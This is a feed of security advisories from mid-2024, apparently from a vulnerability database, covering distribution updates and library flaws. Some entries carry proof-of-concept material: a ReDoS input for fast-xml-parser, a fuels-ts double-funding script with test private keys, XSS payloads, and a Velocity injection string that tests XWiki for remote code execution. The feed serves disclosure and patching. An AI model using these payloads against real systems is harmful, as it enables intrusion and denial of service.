- edk2-CryptoPkg-Test-call-ProcessLibraryConstructorList.patch [RHEL-40270 RHEL-40272]
- edk2-MdePkg-X86UnitTestHost-set-rdrand-cpuid-bit.patch [RHEL-40270 RHEL-40272]
- Resolves: RHEL-40270 (CVE-2023-45237 edk2: Use of a Weak PseudoRandom Number Generator [rhel-9.4.z])
- Resolves: RHEL-40272 (CVE-2023-45236 edk2: Predictable TCP Initial Sequence Numbers [rhel-9.4.z])
[20231122-6.el9_4.1]
- edk2-EmbeddedPkg-Hob-Integer-Overflow-in-CreateHob.patch [RHEL-30156]
- edk2-StandaloneMmPkg-Hob-Integer-Overflow-in-CreateHob.patch [RHEL-30156]
- Resolves: RHEL-30156 (CVE-2022-36765 edk2: integer overflow in CreateHob() could lead to HOB OOB R/W [rhel-9.4.z])
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4749
25.07.2024 02:36:13 | rustsec | [RUSTSEC-2024-0359] The kstring integration in gix-attributes is unsound
`gix-attributes` (in [`state::ValueRef`](https://github.com/Byron/gitoxide/blob/gix-attributes-v0.22.2/gix-attributes/src/state.rs#L19-L27)) unsafely creates a `&str` from a `&[u8]` containing non-UTF8 data, with the justification that so long as nothing reads the `&str` and relies on it being UTF-8 in the `&str`, there is no UB:

```rust
// SAFETY: our API makes accessing that value as `str` impossible, so illformed UTF8 is never exposed as such.
```

The problem is that the non-UTF8 `str` **is** exposed to outside code: first to the `kstring` crate itself, which requires UTF-8 in its documentation and may have UB as a consequence of this, but also to `serde`, where it propagates to e.g. `serde_json`, `serde_yaml`, etc., where the same problems occur. This is not sound, and it could cause further UB down the line in these places that can view the `&str`.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0359
24.07.2024 01:13:25 | almalinux | [ALSA-2024:4720] httpd:2.4 security update (important) | httpd:2.4 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4720
25.07.2024 17:15:33 | maven | [MAVEN:GHSA-7726-43HG-M23V] OpenAM FreeMarker template injection (high) | OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input. Although the developer intended to implement a custom URL for handling login to override the default PingOne Advanced Identity Cloud login page, they did not restrict the `CustomLoginUrlTemplate`, allowing it to be set freely. Commit fcb8432aa77d5b2e147624fe954cb150c568e0b8 introduces `TemplateClassResolver.SAFER_RESOLVER` to disable the resolution of commonly exploited classes in FreeMarker template injection. As of time of publication, this fix is expected to be part of version 15.0.4. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7726-43HG-M23V
25.07.2024 18:19:47 | maven | [MAVEN:GHSA-P528-3MVF-GR87] Remote code execution in Spring Cloud Data Flow (critical) | In Spring Cloud Data Flow versions prior to 2.11.4, a malicious user who has access to the Skipper server API can use a crafted upload request to write an arbitrary file to any location on the file system, which could lead to compromising the server. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P528-3MVF-GR87
25.07.2024 13:45:53 | almalinux | [ALSA-2024:4774] linux-firmware security update (moderate) | linux-firmware security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4774
25.07.2024 11:35:20 | almalinux | [ALSA-2024:4749] edk2 security update (moderate) | edk2 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4749
25.07.2024 11:25:06 | almalinux | [ALSA-2024:4755] libreoffice security update (moderate) | libreoffice security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4755
25.07.2024 11:13:20 | almalinux | [ALSA-2024:4757] libvirt security update (moderate) | libvirt security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4757
26.07.2024 18:11:55 | ubuntu | [USN-6919-1] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6919-1
26.07.2024 17:39:52 | ubuntu | [USN-6918-1] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6918-1
26.07.2024 16:52:00 | ubuntu | [USN-6917-1] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6917-1
26.07.2024 17:18:08 | maven | [MAVEN:GHSA-2HJR-VMF3-XWVP] Elasticsearch Insertion of Sensitive Information into Log File (moderate) | An issue was discovered by Elastic whereby Watcher search input logged the search query results on DEBUG log level. This could lead to raw contents of documents stored in Elasticsearch being printed in logs. Elastic has released 8.11.2 and 7.17.16, which resolve this issue by removing this excessive logging. This issue only affects users that use Watcher and have a Watch defined that uses the search input and additionally have set the search input's logger to DEBUG or finer, for example using: org.elasticsearch.xpack.watcher.input.search, org.elasticsearch.xpack.watcher.input, org.elasticsearch.xpack.watcher, or wider, since the loggers are hierarchical. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2HJR-VMF3-XWVP
26.07.2024 03:00:00 | freebsd | [FREEBSD:3E917407-4B3F-11EF-8E49-001999F8D30B] Mailpit -- Content Security Policy XSS | Mailpit developer reports: A vulnerability was discovered which allowed a bad actor with SMTP access to Mailpit to bypass the Content Security Policy headers using a series of crafted HTML messages which could result in a stored XSS attack via the web UI. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3E917407-4B3F-11EF-8E49-001999F8D30B
26.07.2024 21:09:25 | rustsec | [RUSTSEC-2024-0360] `XmpFile::close` can trigger UB
Affected versions of the crate failed to catch C++ exceptions raised within the `XmpFile::close` function. If such an exception occurred, it would trigger undefined behavior, typically a process abort. This is best demonstrated in [issue #230](https://github.com/adobe/xmp-toolkit-rs/issues/230), where a race condition causes the `close` call to fail due to file I/O errors. This was fixed in [PR #232](https://github.com/adobe/xmp-toolkit-rs/pull/232) (released as crate version 1.9.0), which now safely handles the exception. For backward compatibility, the existing API ignores the error. A new API `XmpFile::try_close` was added to allow callers to receive and process the error result. Users of all prior versions of `xmp_toolkit` are encouraged to update to version 1.9.0 to avoid undefined behavior.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0360
26.07.2024 02:55:00 | ubuntu | [USN-6200-2] ImageMagick vulnerabilities (medium) | Several security issues were fixed in ImageMagick. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6200-2
26.07.2024 14:15:21 | almalinux | [ALSA-2024:4861] squid security update (moderate) | squid security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4861
26.07.2024 18:21:18 | almalinux | [ALSA-2024:4567] java-11-openjdk security update (important) | java-11-openjdk security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4567
27.07.2024 03:00:00 | debian | [DSA-5734-2] bind9 | regression update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5734-2
29.07.2024 22:47:38 | npm | [NPM:GHSA-MPG4-RC92-VX8V] fast-xml-parser vulnerable to ReDOS at currency parsing (high)
### Summary
A ReDOS in currency.js was discovered by the Gauss Security Labs R&D team.
### Details
https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10 contains a vulnerable regex.
### PoC
pass the following string: `'\t'.repeat(13337) + '.'`
### Impact
Denial of service during currency parsing in experimental version 5 of the fast-xml-parser library
https://gauss-security.com
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MPG4-RC92-VX8V
29.07.2024 19:21:34 | ubuntu | [USN-6926-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6926-1
29.07.2024 18:28:53 | go | [GO-2024-3005] Moby authz zero length regression in github.com/moby/moby (critical) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3005
29.07.2024 17:55:29 | ubuntu | [USN-6925-1] Linux kernel vulnerability (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6925-1
29.07.2024 16:55:56 | ubuntu | [USN-6924-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6924-1
29.07.2024 15:51:56 | ubuntu | [USN-6921-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6921-1
29.07.2024 13:38:08 | ubuntu | [USN-6923-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6923-1
29.07.2024 12:54:35 | ubuntu | [USN-6922-1] Linux kernel vulnerabilities (medium) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6922-1
29.07.2024 07:27:32 | ubuntu | [USN-6916-1] Lua vulnerabilities (critical) | Several security issues were fixed in Lua. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6916-1
29.07.2024 07:18:17 | ubuntu | [USN-6920-1] EDK II vulnerabilities (critical) | Several security issues were fixed in EDK II. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6920-1
29.07.2024 03:00:00 | cisa | [CISA-2024:0729] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical) | CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0729
31.07.2024 00:37:55 | npm | [NPM:GHSA-3JCG-VX7F-J6QF] The fuels-ts typescript SDK has no awareness of to-be-spent transactions (low)
# Brief/Intro
The typescript SDK has no awareness of to-be-spent transactions, causing some transactions to fail or silently get pruned as they are funded with already used UTXOs.
The `Typescript SDK` provides the `fund` function which retrieves `UTXOs`, which belong to the owner and can be used to fund the request in question, from fuel's graphql api. These then get added to the request, making it possible to send it to the network as it now has inputs which can be spent by its outputs. Now this works when a user only wants to fund one transaction per block, as in the next block the spent UTXO will not exist anymore. However, if a user wants to fund multiple transactions within one block, the following can happen:
It is important to note that the graphql API will return a random UTXO which has enough value to fund the transaction in question.
- user has 2 spendable `UTXOs` in their wallet which can cover all expenses
- user funds transaction `tA` with an input gotten from the API `iA`
- user submits `tA` to fuel
- `iA` is still in possession of the user as no new block has been produced
- user funds a transaction `tB` and gets the same input `iA` from the API
- user tries to submit transaction `tB` to fuel but now one of the following can happen:
  - if the recipient and all other parameters are the same as in `tA`, submission will fail as `tB` will have the same `txHash` as `tA`
  - if the parameters are different, there will be a collision in the `txpool` and `tA` will be removed from the `txpool`
# Vulnerability Details
The problem occurs because the `fund` function in `fuels-ts/packages/account/src/account.ts` gets the needed resources statelessly with the function `getResourcesToSpend` without taking into consideration already used UTXOs:

```ts
async fund<T extends TransactionRequest>(request: T, params: EstimatedTxParams): Promise<T> {
  // [...]
  let missingQuantities: CoinQuantity[] = [];
  Object.entries(quantitiesDict).forEach(([assetId, { owned, required }]) => {
    if (owned.lt(required)) {
      missingQuantities.push({
        assetId,
        amount: required.sub(owned),
      });
    }
  });
  let needsToBeFunded = missingQuantities.length > 0;
  let fundingAttempts = 0;
  while (needsToBeFunded && fundingAttempts < MAX_FUNDING_ATTEMPTS) {
    const resources = await this.getResourcesToSpend(
      missingQuantities,
      cacheRequestInputsResourcesFromOwner(request.inputs, this.address)
    ); // @audit-issue here we do not exclude ids we already got and used for another transaction in the current block
    request.addResources(resources);
    // [...]
  }
  // [...]
  return request;
}
```

# Impact Details
This issue will lead to unexpected SDK behaviour. Looking at the scenario in `Brief/Intro`, it could have the following impacts for users:
1. A transaction does not get included in the `txpool` / in a block
2. A previous transaction silently gets removed from the `txpool` and replaced with a new one
# Recommendation
I would recommend adding a buffer to the `Account` class, in which retrieved `resources` are saved. These can then be provided to `getResourcesToSpend` to be excluded from future queries but need to be removed from the buffer if their respective transaction fails to be included, in order to be able to use those `resources` again in such cases.
# Proof of Concept
The following PoC transfers 100 coins from `wallet2` to `wallet` after which `wallet2` has two `UTXOs`, one with value `100` and one with a very high value (this is printed to the console). Afterwards, `wallet` will attempt transferring `80` coins back to `wallet2` twice in one block, each in a separate transaction. This should work perfectly fine as `wallet` has two `UTXOs` where each can cover the cost of each respective transaction. Now when running this one of the following will happen:
1. both transfers from `wallet` to `wallet2` get a different `UTXO`. This is the case if execution is successful and `wallet2` has `80` coins more than `wallet` in the end.
2. both transfers get the same `UTXO`. In this case the script will fail and throw an error as then both transactions will have the same hash
In order to execute this PoC, please deploy a local node with a blocktime of `5secs` as I wrote my PoC for that blocktime. Note that with a small change it will also work with other blocktimes. Then add the PoC to a file `poc_resources.ts` and compile it with `tsc poc_resources.ts`. Finally execute it with `node poc_resources.js`. Since the choice which `UTXO` is taken as input is random, it might take a few tries to trigger the bug!

```ts
import { JsonAbi, Script, Provider, WalletUnlocked, Account, Predicate, Wallet, CoinQuantityLike, coinQuantityfy, EstimatedTxParams, BN, Coin, AbstractAddress, Address, Contract, ScriptTransactionRequest } from 'fuels';

const abi: JsonAbi = {
  'encoding': '1',
  'types': [
    { 'typeId': 0, 'type': '()', 'components': [], 'typeParameters': null }
  ],
  'functions': [
    { 'inputs': [], 'name': 'main', 'output': { 'name': '', 'type': 0, 'typeArguments': null }, 'attributes': null }
  ],
  'loggedTypes': [],
  'messagesTypes': [],
  'configurables': []
};

const FUEL_NETWORK_URL = 'http://127.0.0.1:4000/v1/graphql';

async function executeTransaction() {
  const provider = await Provider.create(FUEL_NETWORK_URL);
  const wallet: WalletUnlocked = Wallet.fromPrivateKey('0x37fa81c84ccd547c30c176b118d5cb892bdb113e8e80141f266519422ef9eefd', provider);
  const wallet2: WalletUnlocked = Wallet.fromPrivateKey('0xde97d8624a438121b86a1956544bd72ed68cd69f2c99555b08b1e8c51ffd511c', provider);
  const sleep = (ms: number) => new Promise((resolve) => setTimeout(resolve, ms));

  console.log("Balance wallet before: ", await wallet.getBalance());
  console.log("Balance wallet2 before: ", await wallet2.getBalance());

  // give `wallet` a second UTXO, then wait one block (5s blocktime) so it is spendable
  wallet2.transfer(wallet.address, 100);
  await sleep(5500);

  // two transfers in the same block: both may be funded with the same UTXO
  await wallet.transfer(wallet2.address, 80);
  console.log('wallet -> wallet2');
  await wallet.transfer(wallet2.address, 80);
  console.log('wallet -> wallet2');

  console.log("Balance wallet after: ", await wallet.getBalance());
  console.log("Balance wallet2 after: ", await wallet2.getBalance());
};

executeTransaction().catch(console.error);
```
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3JCG-VX7F-J6QF
30.07.2024 16:20:37 | ubuntu | [USN-6928-1] Python vulnerabilities (high) | Several security issues were fixed in Python. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6928-1
30.07.2024 15:04:43 | ubuntu | [USN-6924-2] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6924-2
30.07.2024 14:26:31 | ubuntu | [USN-6927-1] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6927-1
30.07.2024 13:59:46 | ubuntu | [USN-6923-2] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6923-2
30.07.2024 13:33:56 | ubuntu | [USN-6921-2] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6921-2
30.07.2024 19:30:37 | maven | [MAVEN:GHSA-CP2C-X2PC-FPH7] Apache SeaTunnel Web Authentication vulnerability (high) | Web Authentication vulnerability in Apache SeaTunnel. Since the jwt key is hardcoded in the application, an attacker can forge any token to log in as any user. An attacker can get the secret key in /seatunnel-server/seatunnel-app/src/main/resources/application.yml and then create a token. This issue affects Apache SeaTunnel: 1.0.0. Users are recommended to upgrade to version 1.0.1, which fixes the issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CP2C-X2PC-FPH7
30.07.2024 18:08:49 | maven | [MAVEN:GHSA-H9MQ-F6Q5-6C8M] GraphQL Java does not properly consider ExecutableNormalizedFields (ENFs) as part of preventing denial of service (high) | GraphQL Java (aka graphql-java) before 21.5 does not properly consider ExecutableNormalizedFields (ENFs) as part of preventing denial of service via introspection queries. 20.9 and 19.11 are also fixed versions. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H9MQ-F6Q5-6C8M
30.07.2024 03:00:00 | cisa | [CISA-2024:0730] CISA Adds One Known Exploited Vulnerability to Catalog (medium) | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0730
30.07.2024 12:59:37 | curl | [CURL-CVE-2024-6197] freeing stack buffer in utf8asn1str (medium) | libcurl's ASN1 parser has this utf8asn1str() function used for parsing an ASN.1 UTF-8 string. It can detect an invalid field and return error. Unfortunately, when doing so it also invokes `free()` on a 4 byte local stack buffer. Most modern malloc implementations detect this error and immediately abort. Some however accept the input pointer and add that memory to its list of available chunks. This leads to the overwriting of nearby stack memory. The content of the overwrite is decided by the `free()` implementation; likely to be memory pointers and a set of flags. The most likely outcome of exploiting this flaw is a crash, although it cannot be ruled out that more serious results can be had in special circumstances. | https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6197
30.07.2024 03:00:00 | freebsd | [FREEBSD:FB0B5574-4E64-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes
Chrome Releases reports: This update includes 22 security fixes:
[349198731] High CVE-2024-6988: Use after free in Downloads. Reported by lime(@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group on 2024-06-25
[349342289] High CVE-2024-6989: Use after free in Loader. Reported by Anonymous on 2024-06-25
[346618785] High CVE-2024-6991: Use after free in Dawn. Reported by wgslfuzz on 2024-06-12
[339686368] Medium CVE-2024-6994: Heap buffer overflow in Layout. Reported by Huang Xilin of Ant Group Light-Year Security Lab on 2024-05-10
[343938078] Medium CVE-2024-6995: Inappropriate implementation in Fullscreen. Reported by Alesandro Ortiz on 2024-06-01
[333708039] Medium CVE-2024-6996: Race in Frames. Reported by Louis Jannett (Ruhr University Bochum) on 2024-04-10
[325293263] Medium CVE-2024-6997: Use after free in Tabs. Reported by Sven Dysthe (@svn-dys) on 2024-02-15
[340098902] Medium CVE-2024-6998: Use after free in User Education. Reported by Sven Dysthe (@svn-dys) on 2024-05-13
[340893685] Medium CVE-2024-6999: Inappropriate implementation in FedCM. Reported by Alesandro Ortiz on 2024-05-15
[339877158] Medium CVE-2024-7000: Use after free in CSS. Reported by Anonymous on 2024-05-11
[347509736] Medium CVE-2024-7001: Inappropriate implementation in HTML. Reported by Jake Archibald on 2024-06-17
[338233148] Low CVE-2024-7003: Inappropriate implementation in FedCM. Reported by Alesandro Ortiz on 2024-05-01
[40063014] Low CVE-2024-7004: Insufficient validation of untrusted input in Safe Browsing. Reported by Anonymous on 2023-02-10
[40068800] Low CVE-2024-7005: Insufficient validation of untrusted input in Safe Browsing. Reported by Umar Farooq on 2023-08-04
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:FB0B5574-4E64-11EF-8A0F-A8A1599412C6
01.08.2024 04:30:39 | rockylinux | [RLSA-2024:4935] freeradius security update (important) | An update is available for freeradius. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4935
01.08.2024 04:30:39 | rockylinux | [RLSA-2024:4928] kernel security update (moderate) | An update is available for kernel. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4928
31.07.2024 21:48:41 | maven | [MAVEN:GHSA-5HCJ-RWM6-XMW4] biscuit-java vulnerable to public key confusion in third party block (low)
### Impact
Tokens with third-party blocks containing trusted annotations generated through a third party block request. Due to implementation issues in biscuit-java, third party block support in published versions is inoperative. Nevertheless, to synchronize with other implementations, we publish this advisory and the related fix.
### Description
Third-party blocks can be generated without transferring the whole token to the third-party authority. Instead, a `ThirdPartyBlock` request can be sent, providing only the necessary info to generate a third-party block and to sign it:
- the public key of the previous block (used in the signature)
- the public keys part of the token symbol table (for public key interning in datalog expressions)
A third-party block request forged by a malicious user can trick the third-party authority into generating datalog trusting the wrong keypair.
Consider the following example (nominal case):
* Authority A emits the following token: `check if thirdparty("b") trusting ${pubkeyB}`
* The well-behaving holder then generates a third-party block request based on the token and sends it to third-party authority B
* Third-party B generates the following third-party block: `thirdparty("b"); check if thirdparty("c") trusting ${pubkeyC}`
* The token holder now must obtain a third-party block from third party C to be able to use the token
Now, with a malicious user:
* Authority A emits the following token: `check if thirdparty("b") trusting ${pubkeyB}`
* The holder then attenuates the token with the following third party block `thirdparty("c")`, signed with a keypair (pubkeyD, privkeyD) they generate
* The holder then generates a third-party block request based on this token, but alters the `ThirdPartyBlockRequest` publicKeys field and replaces pubkeyD with pubkeyC
* Third-party B generates the following third-party block: `thirdparty("b"); check if thirdparty("c") trusting ${pubkeyC}`
* Due to the altered symbol table, the actual meaning of the block is `thirdparty("b"); check if thirdparty("c") trusting ${pubkeyD}`
* The attacker can now use the token without obtaining a third-party block from C.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5HCJ-RWM6-XMW4
31.07.2024 21:41:26 | slackware | [SSA:2024-213-01] curl
New curl packages are available for Slackware 15.0 and -current to fix a security issue.
**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/curl-8.9.1-i586-1_slack15.0.txz: Upgraded.
  This update fixes a security issue:
  ASN.1 date parser overread.
  For more information, see:
    https://curl.se/docs/CVE-2024-7264.html
    https://www.cve.org/CVERecord?id=CVE-2024-7264
  (* Security fix *)
```
**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/curl-8.9.1-i586-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/curl-8.9.1-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-8.9.1-i686-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-8.9.1-x86_64-1.txz
**MD5 signatures**
Slackware 15.0 package:
3618aed43686f0b2a099cdb4b2d279aa  curl-8.9.1-i586-1_slack15.0.txz
Slackware x86_64 15.0 package:
1d3e767c8dbeb3cf6f9dd854ff7e194a  curl-8.9.1-x86_64-1_slack15.0.txz
Slackware -current package:
cb1567f34933d0c50b33ae2076988879  n/curl-8.9.1-i686-1.txz
Slackware x86_64 -current package:
ae7d217c3fca35e0001c71244e268fb4  n/curl-8.9.1-x86_64-1.txz
**Installation instructions**
Upgrade the package as root:
`# upgradepkg curl-8.9.1-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-213-01
31.07.2024 21:40:26 | ubuntu | [USN-6939-1] Exim vulnerability (medium) | Exim could be made to bypass a MIME filename extension-blocking protection mechanism if it received specially crafted input. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6939-1
31.07.2024 21:33:13 | ubuntu | [USN-6936-1] Apache Commons Collections vulnerability (critical) | Apache Commons Collections could be made to execute arbitrary code if it received specially crafted input. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6936-1
31.07.2024 23:53:03 | maven | [MAVEN:GHSA-5V8F-XX9M-WJ44] Elasticsearch stores private key on disk unencrypted (moderate) | It was discovered by Elastic engineering that when the elasticsearch-certutil CLI tool is used with the csr option in order to create a new Certificate Signing Request, the associated private key that is generated is stored on disk unencrypted even if the `--pass` parameter is passed in the command invocation. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5V8F-XX9M-WJ44
31.07.2024 21:01:51 | ubuntu | [USN-6913-2] phpCAS vulnerability (high) | phpCAS was vulnerable to an authentication bypass. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6913-2
31.07.2024 23:20:43 | maven | [MAVEN:GHSA-692V-783F-MG8X] XWiki Platform vulnerable to Cross-Site Scripting (XSS) through conflict resolution (critical)
### Impact
By creating a conflict when another user with more rights is currently editing a page, it is possible to execute JavaScript snippets on the side of the other user, which compromises the confidentiality, integrity and availability of the whole XWiki installation.
To reproduce on an XWiki instance, a user with admin rights needs to edit a document without saving right away. Then, as another user without any other right than edit on the specific document, change the whole content to `<script>alert('XSS')</script>`. When the admin user then saves the document, a conflict popup appears. If they select "Fix each conflict individually" and see an alert displaying "XSS", then the instance is vulnerable.
### Patches
This has been patched in XWiki 15.10.8 and 16.3.0RC1.
### Workarounds
We're not aware of any workaround except upgrading.
### References
* https://jira.xwiki.org/browse/XWIKI-21626
* https://github.com/xwiki/xwiki-platform/commit/821d43ec45e67d45a6735a0717b9b77fffc1cd9f
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-692V-783F-MG8X
31.07.2024 19:01:42ubuntu[USN-6938-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6938-1
31.07.2024 18:46:50ubuntu[USN-6937-1] OpenSSL vulnerabilities (critical)Several security issues were fixed in OpenSSL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6937-1
31.07.2024 23:20:33maven[MAVEN:GHSA-H63H-5C77-77P5] XWiki Platform vulnerable to remote code execution from account via SearchSuggestConfigSheet (critical)### Impact Any user with edit right on any page can perform arbitrary remote code execution by adding instances of `XWiki.SearchSuggestConfig` and `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, as a user with neither script nor programming rights, add an object of type `XWiki.SearchSuggestConfig` to your profile page, and an object of type `XWiki.SearchSuggestSourceClass` as well. On this last object, set both the `name` and `icon` properties to `$services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')")` and `limit` and `engine` to `{{/html}}{{async}}{{velocity}}$services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')"){{/velocity}}{{/async}}`. Save and display the page. If the logs contain any message `ERROR attacker - I got programming: true`, then the instance is vulnerable. ### Patches This vulnerability has been patched in XWiki 14.10.21, 15.5.5 and 15.10.2. ### Workarounds We're not aware of any workaround except upgrading. ### References - https://jira.xwiki.org/browse/XWIKI-21473 - https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H63H-5C77-77P5
31.07.2024 23:20:28maven[MAVEN:GHSA-WF3X-JCCF-5G5G] XWiki Platform vulnerable to Cross-site Scripting through attachment filename in uploader (moderate)### Impact When uploading an attachment with a malicious filename, malicious JavaScript code could be executed. This requires a social engineering attack to get the victim to upload a file with a malicious name. The malicious code is solely executed during the upload and affects only the user uploading the attachment. While this allows performing actions in the name of that user, it seems unlikely that a user wouldn't notice the malicious filename while uploading the attachment. To reproduce, as any user, create a file named `"><img src=1 onerror=alert(1)>.jpg`. Then go to any page where you have edit rights and upload the file in the attachments tab. If alerts appear and display "1", then the instance is vulnerable. ### Patches This has been patched in XWiki 14.10.21, 15.5.5, 15.10.6 and 16.0.0. ### Workarounds We're not aware of any workaround except upgrading. ### References * https://jira.xwiki.org/browse/XWIKI-19611 * https://jira.xwiki.org/browse/XWIKI-21769 * https://jira.xwiki.org/browse/XWIKI-19602 * https://github.com/xwiki/xwiki-platform/commit/910a5018a50039e8b24556573dfe342f143ef949 ### Attribution This vulnerability has been independently reported by Aleksey Solovev (Positive Technologies) and Georgios Roumeliotis for TwelveSec.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WF3X-JCCF-5G5G
31.07.2024 23:20:28maven[MAVEN:GHSA-33GP-GMG3-HFPQ] XWiki Platform vulnerable to document deletion and overwrite from edit (moderate)### Impact When a user has edit but not view right on a page in XWiki, that user can delete the page and replace it with a page with new content without having delete right. The previous version of the page is moved into the recycle bin and can be restored from there by an admin. As the user is recorded as the deleter, the user would in theory also be able to view the deleted content, but this is not directly possible as the rights of the previous version are transferred to the new page, so the user still doesn't have view right on it. From all we examined, it therefore doesn't seem to be possible to exploit this to gain any rights. To reproduce, just replace `view` by `edit` in the URL of a page that you cannot view but can edit, and save. This should send the page to the recycle bin and replace it with an empty one if the XWiki installation is vulnerable. After the fix, an error is displayed when saving. ### Patches This has been patched in XWiki 14.10.21, 15.5.5 and 15.10.6 by cancelling save operations when a new document is to be saved although the document already exists. ### Workarounds We're not aware of any workarounds. ### References * https://jira.xwiki.org/browse/XWIKI-21553 * https://github.com/xwiki/xwiki-platform/commit/c5efc1e519e710afdf3c5f40c0fcc300ad77149f 